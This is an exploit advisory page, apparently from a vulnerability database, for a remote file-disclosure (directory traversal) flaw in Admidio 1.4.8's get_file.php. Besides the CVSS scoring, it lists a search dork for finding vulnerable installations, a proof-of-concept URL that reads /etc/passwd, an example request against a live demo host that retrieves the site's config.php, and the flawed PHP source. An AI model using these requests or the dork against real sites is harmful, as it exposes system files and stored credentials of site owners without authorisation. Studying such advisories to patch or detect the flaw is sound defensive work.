Admidio 1.4.8 (getfile.php) Remote File Disclosure Vulnerability

2008-11-24 / 2008-11-25
Credit: n3v3rh00d
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-22


Ogólna skala CVSS: 5/10
Znaczenie: 2.9/10
Łatwość wykorzystania: 10/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Nie wymagana
Wpływ na poufność: Częściowy
Wpływ na integralność: Brak
Wpływ na dostępność: Brak

/---------------------------------------------------------------\ + + + Admidio 1.4.8 Remote File Disclosure + + + \---------------------------------------------------------------/ [*] Author : n3v3rh00d, http://forum.antichat.ru [*] Download : http://prdownloads.sourceforge.net/admidio/admidio-1.4.8.zip [*] Bug Type : Remote File Disclosure [*] Dork : "Admidio Team" [*] POC : /adm_program/modules/download/get_file.php?folder=&file=../../../../../../../../../../etc/passwd&default_folder= [*] Example : http://demo.admidio.org/adm_program/modules/download/get_file.php?folder=&file=../../adm_config/config.php&default_folder= [*] Source : .......................................................... $file = strStripTags(urldecode($_GET['file'])); $act_folder = "../../../adm_my_files/download"; .......................................................... $file_name = "$act_folder/$file"; $file_length = filesize("$act_folder/$file"); .......................................................... header("Content-Type: application/octet-stream"); header("Content-Length: $file_length"); header("Content-Disposition: attachment; filename=\"$file\""); header('Cache-Control: private'); readfile($file_name);


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top